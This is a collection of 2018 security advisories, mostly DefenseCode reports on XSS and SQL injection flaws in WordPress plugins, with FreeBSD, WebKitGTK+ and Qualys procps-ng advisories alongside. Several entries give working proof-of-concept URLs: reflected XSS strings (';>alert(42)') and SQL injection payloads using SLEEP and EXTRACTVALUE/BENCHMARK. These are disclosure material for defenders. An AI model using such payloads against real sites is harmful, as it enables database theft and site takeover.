resolved the security issues. All users are strongly advised to update WordPress Strong Testimonials plugin to the latest available version. 5. Credits == Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer. 6. Disclosure Timeline == 2018/05/24 Vulnerabilities discovered 2018/05/29 Vendor contacted 2018/06/01 Update released 2018/07/24 Advisory released to the public 7. About DefenseCode DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ . E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Twitter: https://twitter.com/DefenseCode/
DefenseCode ThunderScan SAST Advisory: WordPress Gwolle Guestbook Plugin XSS Security Vulnerability
DefenseCode ThunderScan SAST Advisory: WordPress Gwolle Guestbook Plugin XSS Security Vulnerability Advisory ID:DC-2018-05-008 Advisory Title: WordPress Gwolle Guestbook Plugin XSS Security Vulnerability Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Gwolle Guestbook plugin Language: PHP Version:2.5.3 and below Vendor Status: Vendor contacted, update released Release Date: 2018/07/24 Risk: Medium 1. General Overview === During the security audit of Gwolle Guestbook plugin for WordPress CMS, security vulnerability was discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, Gwolle Guestbook is is not just another guestbook for WordPress. The goal is to provide an easy and slim way to integrate a guestbook into your WordPress powered site. According to wordpress.org, it has more than 40,000 active installs. Homepage: https://wordpress.org/plugins/gwolle-gb/ 3. Vulnerability Description During the security analysis, ThunderScan discovered Cross-Site Scripting vulnerability in Gwolle Guestbook WordPress plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. To confirm the vulnerability make sure dashboard widget is added and that there is at least one unchecked entry in the guestbook. The vulnerability was tested using Apache web server. 3.1 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_SERVER['PHP_SELF'] Vulnerable URL: http://vulnerablesite.com/wp-admin/index.php/";>alert(42) File: gwolle-gb/admin/gb-dashboard-widget.php - 150 - 4. Solution === All users are strongly advised to update WordPress Gwolle Guestbook plugin to the latest available version. 5. Credits == Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer. 6. Disclosure Timeline == 2018/06/01 Vulnerability discovered 2018/06/05 Vendor contacted 2018/07/24 Advisory released to the public 7. About DefenseCode DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ . E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Twitter: https://twitter.com/DefenseCode/
DefenseCode ThunderScan SAST Advisory: WordPress Snazzy Maps Plugin Multiple XSS Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress Snazzy Maps Plugin Multiple XSS Security Vulnerabilities Advisory ID:DC-2018-05-006 Advisory Title: WordPress Snazzy Maps Plugin Multiple XSS Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Snazzy Maps plugin Language: PHP Version:1.1.3 and below Vendor Status: Vendor contacted, no response Release Date: 2018/07/24 Risk: Medium 1. General Overview === During the security audit of Snazzy Maps plugin for WordPress CMS, multiple Cross-Site Scripting (XSS) vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, Snazzy Maps can apply styles to your Google Maps with the official Snazzy Maps WordPress plugin. According to wordpress.org, it has more than 60,000 active installs. Homepage: https://wordpress.org/plugins/snazzy-maps/ 3. Vulnerability Description During the security analysis, ThunderScan discovered multiple Cross-Site Scripting vulnerabilities in Snazzy Maps WordPress plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. 3.1 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_GET['text'] Vulnerable URL: http://vulnerablesite.com/wp-admin/themes.php?page=snazzy_maps&tab=1&text=";>alert(42) File: snazzy-maps/admin/explore.php - 28 $text = isset($_GET['text']) ? $_GET['text'] : ''; ... 34 - 3.2 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_GET['tab'] Vulnerable URL: http://vulnerablesite.com/wp-admin/themes.php?page=snazzy_maps&tab=1";>alert(42) File: snazzy-maps/admin/index.php - 69 $active_tab = isset($_GET['tab']) ? $_GET['tab'] : '0'; ... 98 Dismiss - 4. Solution === All users are strongly advised to update WordPress Snazzy Maps plugin to the latest available version as soon as the vendor releases an update that fixes the vulnerabilities. 5. Credits == Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer. 6. Disclosure Timeline == 2018/05/21 Vulnerabilities discovered 2018/05/21 Vendor contacted 2018/07/24 Advisory released to the public 7. About DefenseCode DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ . E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Twitter: https://twitter.com/DefenseCode/
FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:07.lazyfpuSecurity Advisory The FreeBSD Project Topic: Lazy FPU State Restore Information Disclosure Category: core Module: kernel Announced: 2018-06-21 Credits:Julian Stecklina from Amazon Germany Thomas Prescher from Cyberus Technology GmbH Zdenek Sojka from SYSGO AG Colin Percival Affects:All supported version of FreeBSD. Corrected: 2018-06-14 18:50:49 UTC (stable/11, 11.2-PRERELEASE) 2018-06-15 13:21:37 UTC (releng/11.2, 11.2-RC3) 2018-06-21 05:17:13 UTC (releng/11.1, 11.1-RELEASE-p11) CVE Name: CVE-2018-3665 Special Note: This advisory only addresses this issue for FreeBSD 11.x on i386 and amd64. We expect to update this advisory to include 10.x in the near future. For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Modern CPUs have a floating point unit (FPU) which needs to maintain state per thread. One technique is to only save and to only restore the FPU state for a thread when a thread attempts to utilize the FPU. This technique is called Lazy FPU state restore. II. Problem Description A subset of Intel processors can allow a local thread to infer data from another thread through a speculative execution side channel when Lazy FPU state restore is used. III. Impact Any local thread can potentially read FPU state information from other threads running on the host. This could include cryptographic keys when the AES-NI CPU feature is present. IV. Workaround No workaround is available, but non-Intel branded CPUs are not believed to be vulnerable. V. Solution The patch changes from Lazy FPU state restore to Eager FPU state restore. This new technique is the recommended practice from Intel and in some cases can actually increase performance, depending on workload. Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.1] # fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch # fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch.asc # gpg --verify lazyfpu-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r335169 releng/11.2/ r335196 releng/11.1/ r335465 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3665> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:07.lazyfpu.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlsrN1hfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJTLA/+Kt7QLkNCVudaiE+d+VMuC2f1aGhqoyd
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0005
WebKitGTK+ and WPE WebKit Security AdvisoryWSA-2018-0005 Date reported : June 13, 2018 Advisory ID : WSA-2018-0005 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0005.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0005.html CVE identifiers : CVE-2018-4190, CVE-2018-4192, CVE-2018-4199, CVE-2018-4201, CVE-2018-4214, CVE-2018-4218, CVE-2018-4222, CVE-2018-4232, CVE-2018-4233, CVE-2018-11646, CVE-2018-11712, CVE-2018-11713, CVE-2018-12293, CVE-2018-12294. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4190 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Jun Kokatsu (@shhnjk). Impact: Visiting a maliciously crafted website may leak sensitive data. Description: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method. CVE-2018-4192 Versions affected: WebKitGTK+ before 2.20.1. Credit to Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: A race condition was addressed with improved locking. CVE-2018-4199 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Alex Plaskett, Georgi Geshev, Fabi Beterke, and Nils of MWR Labs working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: A buffer overflow issue was addressed with improved memory handling. CVE-2018-4201 Versions affected: WebKitGTK+ before 2.20.1. Credit to an anonymous researcher. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4214 Versions affected: WebKitGTK+ before 2.20.0. Credit to OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to an unexpected application crash. Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4218 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Natalie Silvanovich of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4222 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Natalie Silvanovich of Google Project Zero. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4232 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Aymeric Chaib. Impact: Visiting a maliciously crafted website may lead to cookies being overwritten. Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions. CVE-2018-4233 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-11646 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to Mishra Dhiraj. Maliciously crafted web content could trigger an application crash in WebKitFaviconDatabase, caused by mishandling unexpected input. CVE-2018-11712 Versions affected: WebKitGTK+ 2.20.0 and 2.20.1. Credit to Metrological Group B.V. The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections. CVE-2018-11713 Versions affected: WebKitGTK+ before 2.20.0 or without libsoup 2.62.0. Credit to Dirkjan Ochtman. The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted web sites via a WebSocket connection. CVE-2018-12293 Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1. Credit to ADlab of Venustech. Maliciously crafted web content could achiev
DefenseCode ThunderScan SAST Advisory: WordPress WP Google Map Plugin Multiple SQL injection Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress WP Google Map Plugin Multiple SQL injection Security Vulnerabilities Advisory ID:DC-2018-05-002 Advisory Title: WordPress WP Google Map Plugin Multiple SQL injection Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress WP Google Map plugin Language: PHP Version:4.0.4 and below Vendor Status: Vendor contacted, no response Release Date: 2018/06/12 Risk: High 1. General Overview === During the security audit of WP Google Map plugin for WordPress CMS, multiple SQL injection vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, WP Google Map is #1 Google Maps plugin for WordPress. It allows you to create google maps shortcodes to display responsive google maps on pages, widgets and custom templates. According to wordpress.org, it has more than 100,000 active installs. Homepage: https://wordpress.org/plugins/wp-google-map-plugin/ https://www.wpmapspro.com/ 3. Vulnerability Description During the security analysis, ThunderScan discovered SQL injection vulnerabilities in WP Google Map WordPress plugin. The easiest way to reproduce the vulnerabilities is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Due to the missing nonce token, the vulnerable code is also directly exposed to attack vectors such as Cross Site request forgery (CSRF). 3.1 SQL injection Vulnerable Function: $wpdb->get_results() Vulnerable Variable: $_GET['order'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(4200,MD5(0x42424242),42) File: wp-google-map-plugin/core/class.tabular.php - 520 $order = ( ! empty( $_GET['order'] ) ) ? wp_unslash( $_GET['order'] ) : 'asc'; ... 522 $query_to_run .= " order by {$orderby} {$order}"; ... 530 $this->data = $wpdb->get_results( $query_to_run ); - 3.2 SQL injection Vulnerable Function: $wpdb->get_results() Vulnerable Variable: $_GET['orderby'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc File: wp-google-map-plugin/core/class.tabular.php - 519 $orderby = ( ! empty( $_GET['orderby'] ) ) ? wp_unslash( $_GET['orderby'] ) : $this->primary_col; ... 522 $query_to_run .= " order by {$orderby} {$order}"; ... 530 $this->data = $wpdb->get_results( $query_to_run ); - 4. Solution === All users are strongly advised to update WordPress WP Google Map plugin to the latest available version as soon as the vendor releases an update that fixes the vulnerabilities. 5. Credits == Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer. 6. Disclosure Timeline == 2018/05/11 Vulnerabilities discovered 2018/05/16 Vendor contacted 2018/06/08 No response 2018/06/12 Advisory released to the public 7. About DefenseCode DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ . E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Twitter: https://twitter.com/DefenseCode/
DefenseCode ThunderScan SAST Advisory: WordPress Ultimate Form Builder Lite Plugin Multiple Vulnerabilities (XSS and SQLi)
DefenseCode ThunderScan SAST Advisory: WordPress Ultimate Form Builder Lite Plugin Multiple Vulnerabilities (XSS and SQLi) Advisory ID:DC-2018-05-009 Advisory Title: WordPress Ultimate Form Builder Lite Plugin Multiple Vulnerabilities (XSS and SQLi) Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Ultimate Form Builder Lite plugin Language: PHP Version:1.3.7 and below Vendor Status: Vendor contacted, update released Release Date: 2018/06/12 Risk: Medium 1. General Overview === During the security audit of Ultimate Form Builder Lite plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, Ultimate Form Builder Lite is a free WordPress Plugin which allows you to create various contact forms with drag and drop form builder. Its fun because – you can create, customize and build the beautiful forms for your site on your own, receive contact email on any desired email address and store the form entries in your database which can be exported to CSV for your use via plugin’s backend. According to wordpress.org, it has more than 40,000 active installs. Homepage: https://wordpress.org/plugins/ultimate-form-builder-lite/ 3. Vulnerability Description During the security analysis, ThunderScan discovered Cross-Site Scripting and SQL injection vulnerabilities in Ultimate Form Builder Lite WordPress plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. The easiest way to reproduce the SQL injection vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. 3.1 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_GET['form_id'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=ufbl&action=edit-form&form_id=1";>alert(42) File: ultimate-form-builder-lite/inc/views/backend/form-builder.php - 10 Shortcode: - 3.2 SQL injection Vulnerable Function: $wpdb->get_row() Vulnerable Variable: $_POST['entry_id'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php Vulnerable POST body: entry_id=1&_wpnonce=xxx&action=ufbl_get_entry_detail_action File: ultimate-form-builder-lite/ultimate-form-builder-lite.php - 369 $entry_id = sanitize_text_field( $_POST['entry_id'] ); ... 370 $entry_row = $this->model->get_entry_detail( $entry_id ); - File: ultimate-form-builder-lite\classes\ufbl-model.php - 243 public static function get_entry_detail( $entry_id ) { ... 248 $entry_row = $wpdb->get_row( "SELECT * FROM $entry_table INNER JOIN $form_table ON $entry_table.form_id = $form_table.form_id WHERE $entry_table.entry_id = $entry_id", 'ARRAY_A' ); - 4. Solution === After the vulnerabilities were reported the vendor resolved the security issues. All users are strongly advised to update WordPress Ultimate Form Builder Lite plugin to the latest available version. 5. Credits == Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer. 6. Disclosure Timeline == 2018/06/01 Vulnerabilities discovered 2018/06/06 Vendor contacted 2018/06/08 Vendor responded 2018/06/12 Advisory released to the public 7. About DefenseCode DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensi
DefenseCode ThunderScan SAST Advisory: WordPress Form Maker Plugin Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress Form Maker Plugin Multiple Security Vulnerabilities Advisory ID:DC-2018-05-001 Advisory Title: WordPress Form Maker Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Form Maker plugin Language: PHP Version:1.12.24 and below Vendor Status: Vendor contacted, update released Release Date: 2018/06/07 Risk: High 1. General Overview === During the security audit of Form Maker plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, Form Maker is a power-packed yet user-friendly form builder plugin, best WordPress form builder plugin in WordPress Plugin Directory. According to wordpress.org, it has more than 100 000 active installs. According to the developer's website, it was downloaded over two million times. The exact number of "premium" version installs remains to be determined. Homepage: https://wordpress.org/plugins/form-maker/ https://web-dorado.com/products/wordpress-form.html 3. Vulnerability Description During the security analysis, ThunderScan discovered SQL injection and Cross-Site Scripting vulnerabilities in Form Maker WordPress plugin. The SQL injection points are susceptible to Cross Site Request Forgery (CSRF). The easiest way to reproduce the SQL injection vulnerabilities is to open the presented HTML/JavaScript snippet in your browser while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Since the injection points are also susceptible to CSRF (due to the improper checking of the nonce token), a valid attack vector is also to send a link to the administrator that leads to any attacker controlled web page containing such or similar code snippet. The Cross-Site Scripting vulnerabilities can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. 3.1 SQL injection Vulnerable Function: get_results() Vulnerable Variable: $_POST['name'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct File: form-maker/admin/models/FMSqlMapping.php Proof of Concept: See Appendix #1 - 81 $name = isset($_POST['name']) ? $_POST['name'] : NULL; ... 87 $query = "SHOW COLUMNS FROM " . $name; ... 94 $table_struct = $wpdb_temp->get_results($query); - 3.2 SQL injection Vulnerable Function: get_col() Vulnerable Variable: $_REQUEST['search_labels'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0 File: form-maker/framework/WDW_FM_Library.php Proof of Concept: See Appendix #2 - 3901 $search_labels = isset($_REQUEST['search_labels']) ? $_REQUEST['search_labels'] : ''; ... 3934 $query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d and group_id IN(" . $search_labels . ")", $form_id); 3935 $group_id_s = $wpdb->get_col($query); - 3.3 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_REQUEST["active_tab"] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=themes_fm&task=edit&active_tab=";>alert(42) File: form-maker/admin/views/Themes_fm.php - 192 $active_tab = isset($_REQUEST["active_tab"]) && $_REQUEST["active_tab"] ? $_REQUEST["active_tab"] : ($row->version == 1 ? 'custom_css' : 'global'); ... 199 - 3.4 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_REQUEST["pagination"] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=themes_fm&task=edit&pagination=";>alert(42)<%2Fscript> File: form-maker/adm
DefenseCode ThunderScan SAST Advisory: WordPress Contact Form Maker Plugin Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress Contact Form Maker Plugin Multiple Security Vulnerabilities Advisory ID:DC-2018-05-004 Advisory Title: WordPress Contact Form Maker Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Contact Form Maker plugin Language: PHP Version:1.12.20 and below Vendor Status: Vendor contacted, update released Release Date: 2018/06/07 Risk: High 1. General Overview === During the security audit of Contact Form Maker plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://www.defensecode.com 2. Software Overview According to the plugin developers, Contact Form Maker is a simple form creator plugin, which allows the user with no knowledge of programming to create and edit different type of responsive website forms. The product is similar to the WordPress Form Maker using most of its functionality, whereas there are also some differences. According to wordpress.org, it has more than 60 000 active installs. According to the developer's website, it was downloaded over million times. The exact number of "premium" version installs remains to be determined. Homepage: https://wordpress.org/plugins/contact-form-maker/ https://web-dorado.com/products/wordpress-contact-form-builder.html 3. Vulnerability Description During the security analysis, ThunderScan discovered SQL injection and Cross-Site Scripting vulnerabilities in Contact Form Maker WordPress plugin. The SQL injection points are susceptible to Cross Site Request Forgery (CSRF). The easiest way to reproduce the SQL injection vulnerabilities is to open the presented HTML/JavaScript snippet in your browser while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Since the injection points are also susceptible to CSRF (due to the improper checking of the nonce token), a valid attack vector is also to send a link to the administrator that leads to any attacker controlled web page containing such or similar code snippet. The Cross-Site Scripting vulnerabilities can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. 3.1 SQL injection Vulnerable Function: get_results() Vulnerable Variable: $_POST['name'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct File: contact-form-maker/admin/models/FMSqlMapping.php Proof of Concept: See Appendix #1 - 81 $name = isset($_POST['name']) ? $_POST['name'] : NULL; ... 87 $query = "SHOW COLUMNS FROM " . $name; ... 94 $table_struct = $wpdb_temp->get_results($query); - 3.2 SQL injection Vulnerable Function: get_col() Vulnerable Variable: $_REQUEST['search_labels'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0 File: contact-form-maker/framework/WDW_FM_Library.php Proof of Concept: See Appendix #2 - 3951 $search_labels = isset($_REQUEST['search_labels']) ? $_REQUEST['search_labels'] : ''; ... 3984 $query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d and group_id IN(" . $search_labels . ")", $form_id); 3985 $group_id_s = $wpdb->get_col($query); - 3.3 Cross-Site Scripting Vulnerable Function: echo() Vulnerable Variable: $_REQUEST["active_tab"] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=themes_fmc&task=edit&active_tab=";>alert(42) File: form-maker/admin/views/Themes_fm.php - 192 $active_tab = isset($_REQUEST["active_tab"]) && $_REQUEST["active_tab"] ? $_REQUEST["active_tab"] : ($row->version == 1 ? 'custom_css' : 'global'); ... 199 - 3.4 Cross-Site Scripting Vulnerable Function: e
Qualys Security Advisory - Procps-ng Audit Report
Qualys Security Advisory Procps-ng Audit Report Contents Summary 1. FUSE-backed /proc/PID/cmdline 2. Unprivileged process hiding 3. Local Privilege Escalation in top (Low Impact) 4. Denial of Service in ps 5. Local Privilege Escalation in libprocps (High Impact) 5.1. Vulnerability 5.2. Exploitation 5.3. Exploitation details 5.4. Non-PIE exploitation 5.5. PIE exploitation Acknowledgments Summary We performed a complete audit of procps-ng, the "command line and full screen utilities for browsing procfs, a 'pseudo' file system dynamically generated by the [Linux] kernel to provide information about the status of entries in its process table" (https://gitlab.com/procps-ng/procps). procps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap, ps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w, watch, and the necessary libprocps library. We discovered and submitted patches for more than a hundred bugs and vulnerabilities in procps-ng; for reference, our patches are available at: https://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz In the remainder of this advisory, we present our most interesting findings: 1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120) An attacker can block any read() access to /proc/PID/cmdline by mmap()ing a FUSE file (Filesystem in Userspace) onto this process's command-line arguments. The attacker can therefore block pgrep, pidof, pkill, ps, and w, either forever (a denial of service), or for some controlled time (a synchronization tool for exploiting other vulnerabilities). 2. Unprivileged process hiding (CVE-2018-1121) An unprivileged attacker can hide a process from procps-ng's utilities, by exploiting either a denial of service (a rather noisy method) or a race condition inherent in reading /proc/PID entries (a stealthier method). 3. Local Privilege Escalation in top (CVE-2018-1122) top reads its configuration file from the current working directory, without any security check, if the HOME environment variable is unset or 